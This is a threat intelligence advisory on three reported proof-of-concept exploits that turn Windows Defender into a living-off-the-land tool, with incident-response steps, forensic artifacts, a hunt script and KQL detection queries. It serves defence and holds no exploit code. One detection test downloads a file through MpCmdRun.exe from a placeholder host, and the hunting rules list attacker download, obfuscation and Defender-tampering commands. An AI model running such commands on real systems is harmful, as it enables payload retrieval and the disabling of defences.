Severity: CRITICAL
CVSS: 9.5
Priority: 0.750
Executive Summary
Three proof-of-concept exploits targeting Windows Defender have been publicly disclosed in security news reporting (not yet assigned CVE identifiers), enabling attackers to weaponize Microsoft's own trusted security platform as a living-off-the-land attack vector. Two of the three vulnerabilities remain unpatched, leaving enterprise environments without vendor-supplied remediation and no reliable way to remove the attack surface without disabling core endpoint protection. This disclosure signals a maturing attacker playbook: rather than bypassing security tools, adversaries are learning to operate through them, fundamentally challenging the assumption that trusted system components are safe to run with elevated privilege.
Impact Assessment
CISA KEV Status: Not listed
Threat Severity: CRITICAL (immediate action required)
Actor Attribution: HIGH (unknown; attribution not established in available reporting)
TTP Sophistication: HIGH (7 MITRE ATT&CK techniques identified)
Detection Difficulty: HIGH (multiple evasion techniques observed)
Target Scope: INFO (Microsoft Windows Defender, built-in endpoint security platform; specific versions unconfirmed in source data)
Business Context
Windows Defender is deployed by default across virtually every Windows enterprise environment, meaning the exposed attack surface is near-universal without requiring any misconfiguration or optional software installation. With two vulnerabilities unpatched and no CVE-anchored remediation timeline from Microsoft, security teams face an indeterminate exposure window during which attackers can abuse a component organizations cannot simply remove. If exploitation moves from proof-of-concept to active threat actor use, organizations may face incident response costs, regulatory scrutiny under breach notification obligations, and reputational damage tied to a security failure rooted in the security tool itself.
You Are Affected If
Your organization runs Windows Defender as primary or layered endpoint protection on Windows workstations, servers, or cloud instances
Your EDR or SIEM platform excludes Windows Defender processes from behavioral monitoring or alerting by default
Your environment relies on Windows built-in security controls as a primary defense layer without compensating network or identity controls
Your patch management process is dependent on CVE assignment or MSRC advisories, creating a gap for unassigned vulnerabilities
Your organization operates in a sector with high attacker interest (financial services, healthcare, critical infrastructure) where living-off-the-land techniques are commonly observed in threat intelligence reporting
Board Talking Points
Attackers have demonstrated the ability to weaponize Windows Defender, the security software built into every Windows computer our organization runs, making it a vehicle for attack rather than protection.
Two of the three known attack methods have no patch available; until Microsoft releases fixes, we are hardening monitoring controls and restricting local admin access as compensating measures — this work should begin within the next 5 business days.
If we do not act and these techniques move from proof-of-concept to active exploitation, our standard endpoint defenses may fail to detect an attacker operating silently through a trusted system process, increasing breach risk and potential regulatory exposure.
Technical Analysis
The disclosed proof-of-concept exploits target Windows Defender's privileged, trusted operational context, converting it from a defensive layer into an execution and evasion platform.
The underlying weaknesses map to three CWEs: improper privilege management (CWE-269), incorrect permission assignment for critical resources (CWE-732), and improper access control (CWE-284).
Together, these conditions allow an attacker who has achieved initial access to exploit Defender's elevated trust to escalate privileges, persist without triggering detection, and execute malicious code under the cover of a signed, vendor-trusted process.
The living-off-the-land dimension is the defining feature of this disclosure. MITRE ATT&CK techniques present in the reported activity include T1068 (exploitation for privilege escalation), T1574 (hijack execution flow), T1218 (signed binary proxy execution), T1562.001 (impair defenses: disable or modify tools), T1036 (masquerading), and T1059 (command and scripting interpreter). The convergence of these techniques under a single, trusted process creates a detection gap that most EDR stacks are poorly positioned to close: behavioral rules built to flag anomalous processes typically exclude Defender itself from scrutiny.
Two of the three vulnerabilities lack patches as of publication. Source data originates from security news reporting (Dark Reading, SQ Magazine, SafeStorz) rather than NVD, CISA KEV, or a Microsoft Security Response Center advisory, and no CVE identifiers were assigned in available reporting. Technical confidence is medium. Organizations should monitor MSRC and NVD for CVE assignment and patch availability. Until CVE identifiers and patches are released, remediation relies on compensating controls. The absence of CVE identifiers and patch status from authoritative sources makes remediation planning difficult and increases the operational window for attackers holding knowledge of these techniques.
For security operations teams, the core defensive gap this exposes is implicit trust in signed system processes. EDR platforms that exclude Defender-associated binaries from behavioral monitoring, or that elevate alerts from Defender processes without scrutiny, are structurally blind to this attack pattern. Detection engineering must now account for the possibility that the security platform itself is the threat actor's vehicle.
Action Checklist (IR Enriched)
Triage Priority: IMMEDIATE
Escalate to CISO and legal/compliance immediately if forensic review of MpCmdRun.exe execution logs, MPLog files, or Sysmon Event ID 1 (Process Create) reveals Defender binaries spawning unexpected child processes, initiating outbound connections to non-Microsoft infrastructure, or downloading files from external URLs, as this indicates active exploitation of the unpatched PoCs with potential for lateral movement and data exfiltration across the full managed endpoint estate.
Step 1: Assess exposure. Confirm your organization runs Windows Defender as the primary or layered endpoint security platform on any managed devices, including servers, workstations, and cloud-hosted Windows instances.
IR Detail
Preparation
NIST 800-61r3 §2 — Preparation: Establishing IR Capability and Asset Awareness
NIST IR-4 (Incident Handling)
NIST SI-5 (Security Alerts, Advisories, and Directives)
CIS 1.1 (Establish and Maintain Detailed Enterprise Asset Inventory)
CIS 2.1 (Establish and Maintain a Software Inventory)
Compensating Control
Run the following PowerShell one-liner across managed endpoints via Group Policy logon script or PSRemoting to enumerate Defender status: `Get-MpComputerStatus | Select-Object AMRunningMode, AntispywareEnabled, RealTimeProtectionEnabled, ComputerID | Export-Csv C:\defender_audit.csv -Append`. For cloud-hosted Windows instances (Azure/AWS), query the guest OS via Systems Manager Run Command or Azure Run Command with the same script. Aggregate CSVs centrally — a 2-person team can parse with `Import-Csv` filtering on `AMRunningMode -ne 'Not running'` to scope exposure.
Preserve Evidence
Before scoping, capture the current Defender operational state as a baseline: export `HKLM\SOFTWARE\Microsoft\Windows Defender` registry hive (specifically `DisableAntiSpyware`, `DisableRealtimeMonitoring` DWORD values) to detect pre-existing tamper; pull `Get-MpThreatDetection` output to identify any Defender alerts already generated against its own process space; collect Windows Event Log — Microsoft-Windows-Windows Defender/Operational (Event IDs 1116, 1117, 5001) to establish a pre-incident detection baseline before exclusion audits potentially alter state.
Step 2: Review controls. Audit EDR and SIEM exclusion lists (if present) to determine whether Windows Defender processes are whitelisted or deprioritized in behavioral monitoring; if so, evaluate whether those exclusions can be narrowed without breaking legitimate detections. If Defender is already included in monitoring, confirm detection rules account for malicious child process spawning from Defender binaries.
IR Detail
Detection & Analysis
NIST 800-61r3 §3.2 — Detection and Analysis: Identifying Attack Vectors and Analyzing Indicators
NIST SI-4 (System Monitoring)
NIST AU-2 (Event Logging)
NIST AU-6 (Audit Record Review, Analysis, and Reporting)
CIS 8.2 (Collect Audit Logs)
CIS 7.1 (Establish and Maintain a Vulnerability Management Process)
Compensating Control
Without a commercial EDR, deploy Sysmon with a config that explicitly does NOT exclude MsMpEng.exe (the Defender service process) or MpCmdRun.exe (the Defender command-line utility) — both are prime LoTL abuse binaries in this threat. Use the SwiftOnSecurity Sysmon config as a base but remove any `<Exclude>` rules matching `MsMpEng.exe` or `MpCmdRun.exe` from ProcessCreate (Event ID 1), NetworkConnect (Event ID 3), and ImageLoad (Event ID 7) filters. Forward Sysmon XML logs to a central syslog server (e.g., rsyslog on Linux) for manual review. Write a Sigma rule targeting `ParentImage: '*\MsMpEng.exe'` with unexpected child processes (cmd.exe, powershell.exe, wscript.exe) as the detection condition.
Preserve Evidence
Capture BEFORE narrowing exclusions: export the full exclusion configuration from Defender (`Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess, ExclusionExtension`) and your SIEM/EDR suppression rule lists as timestamped snapshots — these document the pre-remediation attack surface and serve as legal artifacts if exploitation occurred during the exposure window. Also pull Windows Security Event Log Event ID 4688 (Process Creation with command-line auditing enabled) filtered on `ProcessName` containing `MpCmdRun.exe` or `MsMpEng.exe` with unexpected parent-child relationships, which would indicate the PoC abuse pattern of spawning processes through Defender's trusted context.
Step 3: Evaluate compensating controls. Since two of three vulnerabilities are unpatched, prioritize least-privilege enforcement, local admin access restrictions, and application control policies that limit what processes Defender binaries can spawn or interact with.
IR Detail
Containment
NIST 800-61r3 §3.3 — Containment: Selecting a Containment Strategy
NIST IR-4 (Incident Handling)
NIST SI-2 (Flaw Remediation)
NIST SI-7 (Software, Firmware, and Information Integrity)
CIS 4.6 (Securely Manage Enterprise Assets and Software)
CIS 5.4 (Restrict Administrator Privileges to Dedicated Administrator Accounts)
CIS 6.5 (Require MFA for Administrative Access)
Compensating Control
Implement the following in sequence for a resource-constrained team: (1) Use AppLocker or Windows Defender Application Control (WDAC) policy to create a rule that blocks `MpCmdRun.exe` from spawning interpreter processes — deploy via GPO with `Set-AppLockerPolicy`. (2) Enforce local admin restrictions via the Local Administrator Password Solution (LAPS) — free from Microsoft — to eliminate credential reuse that would allow lateral movement after Defender abuse. (3) Configure Windows Firewall via GPO to block outbound connections from `MsMpEng.exe` to non-Microsoft IP ranges (allow only `*.update.microsoft.com` and `*.wdcp.microsoft.com`) using `netsh advfirewall firewall add rule name="Block MsMpEng Outbound" program="%ProgramFiles%\Windows Defender\MsMpEng.exe" action=block dir=out` (netsh expects double-quoted values when run from cmd.exe). This constrains C2 callback potential if the Defender binary is weaponized.
Preserve Evidence
Before implementing application control changes, capture: (1) a process tree snapshot using `Get-Process -IncludeUserName | Where-Object {$_.Path -like '*Defender*'}` to detect any currently anomalous Defender child processes already running; (2) review `C:\ProgramData\Microsoft\Windows Defender\Support\MPLog-*.log` files for entries showing MpCmdRun.exe execution with unusual command-line arguments (e.g., `-DownloadFile`, `-url` flags which enable Defender as a file downloader — a known LoTL abuse vector); (3) collect a memory snapshot of MsMpEng.exe process space using ProcDump (`procdump.exe -ma MsMpEng.exe defender_mem.dmp`) before containment changes, as in-memory indicators of exploitation will not survive process restart.
Step 4: Update the threat model. Add living-off-the-land abuse of trusted security tools as an explicit attack pattern in your threat register, and map it to MITRE ATT&CK T1218 (signed binary proxy execution) and T1562.001 (impair defenses) for detection coverage review.
IR Detail
Post-Incident
NIST 800-61r3 §4 — Post-Incident Activity: Lessons Learned and Detection Improvement
NIST IR-8 (Incident Response Plan)
NIST RA-3 (Risk Assessment)
NIST SI-4 (System Monitoring)
CIS 7.1 (Establish and Maintain a Vulnerability Management Process)
CIS 7.2 (Establish and Maintain a Remediation Process)
Compensating Control
For teams without a formal threat modeling tool: (1) Add a row to your existing risk register (spreadsheet acceptable) with ATT&CK T1218 and T1562.001 explicitly tied to `MpCmdRun.exe` and `MsMpEng.exe` as the abused binaries, not generic LOLBin categories. (2) Search the Sigma rule repository (github.com/SigmaHQ/sigma) for existing rules matching `MpCmdRun.exe -DownloadFile` (maps to T1218) and Defender service tampering (T1562.001) — at least two community rules exist for these exact patterns. (3) Test detection gap by running `MpCmdRun.exe -DownloadFile -url http://test.example.com -path C:\test.txt` in a sandboxed VM and confirm whether your current logging captures the event before adding the Sigma rule to production.
Preserve Evidence
To establish whether this attack pattern has already been used in your environment prior to threat model update: query Windows Security Event Log Event ID 4688 with command-line auditing enabled, filtering for `MpCmdRun.exe` arguments containing `-DownloadFile`, `-url`, `-Scan -ScanType 3` (custom scan that can be abused), or unusual `-SignatureUpdate` paths pointing to non-Microsoft UNC paths; additionally review PowerShell Script Block Logging (Event ID 4104) for any scripts that invoke `MpCmdRun.exe` programmatically, which would indicate attacker tooling rather than legitimate Defender automation.
Step 5: Monitor developments. Track Microsoft Security Response Center (MSRC) advisories and CISA KEV for CVE assignments, patch releases, or exploitation-in-the-wild confirmations tied to Windows Defender privilege and access control weaknesses.
IR Detail
Preparation
NIST 800-61r3 §2 — Preparation: Maintaining IR Readiness Through Threat Intelligence Integration
NIST SI-5 (Security Alerts, Advisories, and Directives)
NIST IR-6 (Incident Reporting)
NIST AU-6 (Audit Record Review, Analysis, and Reporting)
CIS 7.1 (Establish and Maintain a Vulnerability Management Process)
CIS 7.2 (Establish and Maintain a Remediation Process)
Compensating Control
Configure free RSS/API-based alerting for a 2-person team with no threat intel platform: (1) Subscribe to the MSRC Security Update Guide RSS feed filtered on product 'Microsoft Defender Antivirus' — direct URL pattern: `https://api.msrc.microsoft.com/cvrf/v2.0/cvrf/<YYYY-MMM>` queried monthly. (2) Set a CISA KEV JSON feed monitor (`https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json`) using a daily cron job with `jq '.vulnerabilities[] | select(.product | test("Defender"; "i"))'` to auto-filter Defender entries. (3) Create a GitHub search alert for new public PoC repositories matching 'Windows Defender exploit' or 'MpCmdRun PoC' to detect the PoC maturation of the two currently unpatched vulnerabilities before MSRC formally assigns CVEs.
Preserve Evidence
Establish a monitoring baseline NOW before CVEs are assigned: document the current Defender version on all asset classes using `Get-MpComputerStatus | Select-Object AMProductVersion, AMEngineVersion, AMServiceVersion` — store this as a dated CSV so you can immediately identify which assets require emergency patching the moment MSRC releases fixes for the two unpatched PoCs. Additionally, configure Windows Event ID 1033 (Defender platform update) and 1034 (Defender platform update failed) monitoring so you have auditable proof of patch deployment timing relative to any future exploitation-in-the-wild confirmation.
Recovery Guidance
Once compensating controls are implemented, validate integrity of all Windows Defender binary files (`MsMpEng.exe`, `MpCmdRun.exe`, `mpengine.dll`) via SHA-256 hash comparison against Microsoft's published file version catalog before re-trusting Defender telemetry as a detection source — an attacker who weaponized Defender may have also tampered with its detection engine. Maintain elevated Sysmon and Windows Event Log verbosity on Defender process activity for a minimum of 30 days post-containment or until Microsoft releases patches for the two unpatched vulnerabilities, whichever is longer. Upon patch release, treat the update as a critical emergency change with a 72-hour deployment SLA and re-verify the `AMProductVersion` via `Get-MpComputerStatus` across all asset classes to confirm closure.
Key Forensic Artifacts
MpCmdRun.exe execution history: Windows Security Event Log Event ID 4688 (Process Creation) with command-line auditing enabled, filtered on ImagePath containing MpCmdRun.exe — captures LoTL abuse patterns including -DownloadFile and -url arguments that weaponize Defender as a file retrieval proxy (T1218)
Windows Defender Operational log: Microsoft-Windows-Windows Defender/Operational (Event IDs 1116 threat detected, 1117 action taken, 5001 real-time protection disabled, 5007 configuration changed) located at C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx — configuration change events (5007) specifically reveal if an attacker modified exclusion lists via the PoC to blind Defender to subsequent payloads (T1562.001)
Defender support logs: C:\ProgramData\Microsoft\Windows Defender\Support\MPLog-*.log files contain verbose records of MpCmdRun.exe command-line executions including full argument strings, timestamps, and calling process context — primary artifact for reconstructing PoC exploitation timeline without a SIEM
Registry tamper artifacts: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths and HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes registry keys — attacker exploitation of these vulnerabilities to achieve persistence or blind detection would leave evidence of unauthorized exclusion additions with timestamps recoverable via RegRipper or manual `reg query` output
Sysmon Event ID 7 (ImageLoad) for Defender process space: records of non-Microsoft DLLs loaded into MsMpEng.exe or MpCmdRun.exe process memory — a DLL injection or hijacking variant of these PoCs would appear here as unsigned or low-reputation module loads into the trusted Defender process, recoverable from Sysmon operational log at Microsoft-Windows-Sysmon/Operational
Detection Guidance
Detection for this attack pattern is structurally difficult because the malicious activity occurs within or adjacent to a trusted, signed process. The following behavioral signals warrant investigation.
Process and execution monitoring: Hunt for Windows Defender-associated processes (MsMpEng.exe, MpCmdRun.exe) spawning unexpected child processes, particularly shells (cmd.exe, powershell.exe) or network-connected binaries. These parent-child relationships are anomalous and should generate high-confidence alerts regardless of the parent's trusted status.
Privilege escalation indicators: Log and alert on token manipulation events, unexpected privilege grants, or process integrity level changes originating from Defender process space. CWE-269 and CWE-732 exploitation will likely produce token or permission artifacts visible in Windows Security Event logs (Event IDs 4672, 4673, 4688).
Defense impairment: Monitor for modifications to Defender configuration, exclusion lists, or real-time protection status (Event ID 5001, 5004, 5007 in Windows Defender operational logs). T1562.001 techniques may attempt to disable scanning for specific paths or processes used in the attack chain.
Signed binary proxy execution: Review for LOLBin activity (T1218) initiated from Defender process context. Sysmon Event ID 1 (process creation) with parent image matching Defender binaries and unexpected command-line arguments is a high-fidelity hunt lead.
Log sources to prioritize: Windows Security Event Log, Windows Defender Operational Log (Microsoft-Windows-Windows Defender/Operational), Sysmon (if deployed), and EDR process tree telemetry. Query for Defender process spawning any interactive or network-capable child process with no corresponding user-initiated scan event.
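One way to implement the hunt conditions from Step 2 (Defender binary as parent of an interpreter), Step 4 (MpCmdRun.exe download and UNC signature-update arguments) and the Detection Guidance above, as an added Python example that is not part of the original page. It runs offline over constructed sample events shaped like Sysmon Event ID 1 / Security Event ID 4688 and Defender Operational records; hostnames, paths and the share name are made up for the demonstration.

```python
"""Hunt logic for the Defender abuse patterns described above (added example,
not code from the original page; all sample telemetry is constructed). Checks:
  1. MsMpEng.exe/MpCmdRun.exe as parent of a shell or script interpreter
     (the Step 2 Sigma condition; ATT&CK T1218).
  2. MpCmdRun.exe run with download arguments or a UNC signature path
     (the Step 4 Event ID 4688 hunt; T1218).
  3. Defender Operational Event IDs 5001/5004/5007 (T1562.001).
"""
from dataclasses import dataclass
from typing import List, Tuple
import ntpath

DEFENDER_BINARIES = {"msmpeng.exe", "mpcmdrun.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
DOWNLOAD_ARGS = {"-downloadfile", "-url"}
IMPAIR_EVENTS = {5001: "real-time protection disabled",
                 5004: "real-time protection configuration changed",
                 5007: "Defender configuration changed"}
Finding = Tuple[str, str, str]   # (host, ATT&CK technique, reason)

@dataclass
class ProcessEvent:           # Sysmon Event ID 1 or Security Event ID 4688
    host: str
    image: str                # Image / NewProcessName
    parent_image: str         # ParentImage / ParentProcessName
    command_line: str         # CommandLine (4688 needs command-line auditing)

@dataclass
class DefenderOpEvent:        # Microsoft-Windows-Windows Defender/Operational
    host: str
    event_id: int
    message: str

def _base(path: str) -> str:
    return ntpath.basename(path).lower()

def _args(command_line: str) -> List[str]:
    # Quotes are dropped rather than parsed; sufficient for flag matching.
    return command_line.replace('"', " ").lower().split()

def check_process(ev: ProcessEvent) -> List[Finding]:
    """Defender binary as parent of an interpreter, or MpCmdRun.exe misuse."""
    found: List[Finding] = []
    image, parent = _base(ev.image), _base(ev.parent_image)
    if parent in DEFENDER_BINARIES and image in INTERPRETERS:
        found.append((ev.host, "T1218", f"{parent} spawned {image}: {ev.command_line}"))
    if image == "mpcmdrun.exe":
        args = _args(ev.command_line)
        if DOWNLOAD_ARGS & set(args):
            found.append((ev.host, "T1218", f"MpCmdRun.exe as downloader: {ev.command_line}"))
        if "-signatureupdate" in args and any(a.startswith("\\\\") for a in args):
            found.append((ev.host, "T1218", f"signature update from UNC path: {ev.command_line}"))
    return found

def check_defender_op(ev: DefenderOpEvent) -> List[Finding]:
    """Defence-impairment events only; 1116/1117 detections are baseline, not findings."""
    if ev.event_id not in IMPAIR_EVENTS:
        return []
    return [(ev.host, "T1562.001", f"event {ev.event_id} ({IMPAIR_EVENTS[ev.event_id]}): {ev.message}")]

def hunt(procs: List[ProcessEvent], ops: List[DefenderOpEvent]) -> List[Finding]:
    return [f for p in procs for f in check_process(p)] + \
           [f for o in ops for f in check_defender_op(o)]

# Constructed sample telemetry; hostnames, paths and the share name are made up.
MPCMDRUN = r"C:\Program Files\Windows Defender\MpCmdRun.exe"
MSMPENG = r"C:\Program Files\Windows Defender\MsMpEng.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"
SAMPLE_PROCS = [
    ProcessEvent("WS01", CMD, MSMPENG, "cmd.exe /c whoami"),
    ProcessEvent("WS01", MPCMDRUN, CMD,
                 rf'"{MPCMDRUN}" -DownloadFile -url http://test.example.com -path C:\test.txt'),
    ProcessEvent("SRV02", MPCMDRUN, SVCHOST, rf'"{MPCMDRUN}" -SignatureUpdate -UNC \\fileserver01\defs'),
    ProcessEvent("SRV02", MPCMDRUN, SVCHOST, rf'"{MPCMDRUN}" -Scan -ScanType 1'),  # routine scan
    ProcessEvent("WS01", CMD, r"C:\Windows\explorer.exe", "cmd.exe"),             # user shell
]
SAMPLE_OPS = [
    DefenderOpEvent("WS01", 5007, r"Exclusions\Paths value added: C:\Temp"),
    DefenderOpEvent("WS01", 1116, "threat detected"),   # baseline detection, not impairment
]

def demo() -> List[Finding]:
    return hunt(SAMPLE_PROCS, SAMPLE_OPS)

if __name__ == "__main__":
    for host, technique, reason in demo():
        print(f"{host} {technique}: {reason}")
```

Feeding real 4688 or Sysmon exports into ProcessEvent is a matter of mapping the field names shown in the comments; the routine scan and user-shell samples show the benign cases the checks deliberately leave alone.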
Indicators of Compromise (3)
TOOL: MpCmdRun.exe. Windows Defender command-line utility potentially leveraged via privilege escalation exploits to execute malicious actions under trusted process context, evading behavioral detection controls. Confidence: MEDIUM.
TOOL: MsMpEng.exe. Windows Defender antimalware service engine identified as target process in CWE-269 and CWE-284 exploitation chain; abuse enables privileged execution within trusted security context. Confidence: MEDIUM.
URL: Pending. Refer to Dark Reading (https://www.darkreading.com/cyberattacks-data-breaches/exploits-turn-windows-defender-attacker-tool) for published technical indicators. Source reporting may contain PoC repository references, file hashes, or additional technical indicators not reproduced in available summary data. Confidence: LOW.
Platform Playbooks (Microsoft Sentinel / Defender, CrowdStrike Falcon, AWS Security)
License tiers and available log sources for the Microsoft queries below:
Microsoft 365 E3: 3 log sources. Basic identity + audit. No endpoint advanced hunting. Defender for Endpoint requires separate P1/P2 license.
Microsoft 365 E5: 18 log sources. Full Defender suite: Endpoint P2, Identity, Office 365 P2, Cloud App Security. Advanced hunting across all workloads.
E5 + Sentinel: 27 log sources. All E5 tables + SIEM data (CEF, Syslog, Windows Security Events, Threat Intelligence). Analytics rules, playbooks, workbooks.
Query legend: hard indicator (direct match); contextual (behavioral query); shared platform (review required).
IOC Detection Queries (3)
MpCmdRun.exe is a legitimate Windows Defender binary, so this is a contextual indicator rather than a hard match: execution alone is expected, and hits are hunt leads to be reviewed for an unexpected parent process or command-line arguments.
// Threat: Windows Defender Weaponized: Three PoC Exploits Enable Living-Off-the-Land Attac
// Attack tool: MpCmdRun.exe
// Context: Windows Defender command-line utility potentially leveraged via privilege escalation exploits to execute malicious actions under trusted process context, evading behavioral detection controls
DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName =~ "MpCmdRun.exe"
or ProcessCommandLine has "MpCmdRun.exe"
or InitiatingProcessCommandLine has "MpCmdRun.exe"
| project Timestamp, DeviceName, FileName, FolderPath,
ProcessCommandLine, AccountName, AccountDomain,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
MsMpEng.exe is the Defender service process and runs continuously on every Windows host, so this is a contextual indicator rather than a hard match: review the results for unexpected child processes or initiating command lines rather than treating any execution as suspicious.
// Threat: Windows Defender Weaponized: Three PoC Exploits Enable Living-Off-the-Land Attac
// Attack tool: MsMpEng.exe
// Context: Windows Defender antimalware service engine identified as target process in CWE-269 and CWE-284 exploitation chain; abuse enables privileged execution within trusted security context
DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName =~ "MsMpEng.exe"
or ProcessCommandLine has "MsMpEng.exe"
or InitiatingProcessCommandLine has "MsMpEng.exe"
| project Timestamp, DeviceName, FileName, FolderPath,
ProcessCommandLine, AccountName, AccountDomain,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
1 URL indicator(s).
// Threat: Windows Defender Weaponized: Three PoC Exploits Enable Living-Off-the-Land Attac
// No URL indicators were published in available reporting; the list below holds a placeholder.
// Replace it with indicators from the Dark Reading source before running the query.
let malicious_urls = dynamic(["<URL-INDICATOR-PLACEHOLDER>"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any (malicious_urls)
| project Timestamp, DeviceName, RemoteUrl, RemoteIP,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
MITRE ATT&CK Hunting Queries (4)
Sentinel rule: Suspicious PowerShell command line
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
| where ProcessCommandLine has_any ("-enc", "-nop", "bypass", "hidden", "downloadstring", "invoke-expression", "iex", "frombase64", "new-object net.webclient")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: LOLBin abuse (mshta, regsvr32, rundll32)
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "cmstp.exe", "msiexec.exe")
| where ProcessCommandLine has_any ("http", "ftp", "\\\\", "javascript:", "vbscript:", "scrobj.dll", "/i:", "-decode", "-urlcache")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Security tool tampering
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has_any (
"Set-MpPreference", "DisableRealtimeMonitoring",
"net stop", "sc stop", "sc delete", "taskkill /f",
"Add-MpPreference -ExclusionPath"
)
| where ProcessCommandLine has_any ("defender", "sense", "security", "antivirus", "firewall", "crowdstrike", "sentinel")
| project Timestamp, DeviceName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Process name masquerading
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("svchost.exe", "csrss.exe", "lsass.exe", "services.exe", "smss.exe")
| where not (FolderPath startswith "C:\\Windows\\System32" or FolderPath startswith "C:\\Windows\\SysWOW64" or FolderPath startswith "C:\\Windows\\WinSxS")
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, ProcessCommandLine, InitiatingProcessFileName
| sort by Timestamp desc
No actionable IOCs for CrowdStrike import (benign/contextual indicators excluded).
No hard IOCs available for AWS detection queries (contextual/benign indicators excluded).
Compliance Framework Mappings
MITRE ATT&CK: T1203, T1068, T1574, T1059, T1218, T1562.001 (+1 more)
NIST SP 800-53: SC-7, SI-2, SI-3, SI-4, AC-6, CM-7 (+2 more)
CIS Controls v8: 5.4, 6.8, 3.3, 6.1, 6.2, 7.3 (+2 more)
MITRE ATT&CK Mapping
T1203 Exploitation for Client Execution (execution)
T1068 Exploitation for Privilege Escalation (privilege-escalation)
T1574 Hijack Execution Flow (persistence)
T1059 Command and Scripting Interpreter (execution)
T1218 System Binary Proxy Execution (defense-evasion)
T1562.001 Disable or Modify Tools (defense-evasion)
T1036 Masquerading (defense-evasion)
Guidance Disclaimer
The analysis, framework mappings, and incident response recommendations in this intelligence item are derived from established industry standards including NIST SP 800-61, NIST SP 800-53, CIS Controls v8, MITRE ATT&CK, and other recognized frameworks. This content is provided as supplemental intelligence guidance only and does not constitute professional incident response services. Organizations should adapt all recommendations to their specific environment, risk tolerance, and regulatory requirements. This material is not a substitute for your organization's official incident response plan, legal counsel, or qualified security practitioners.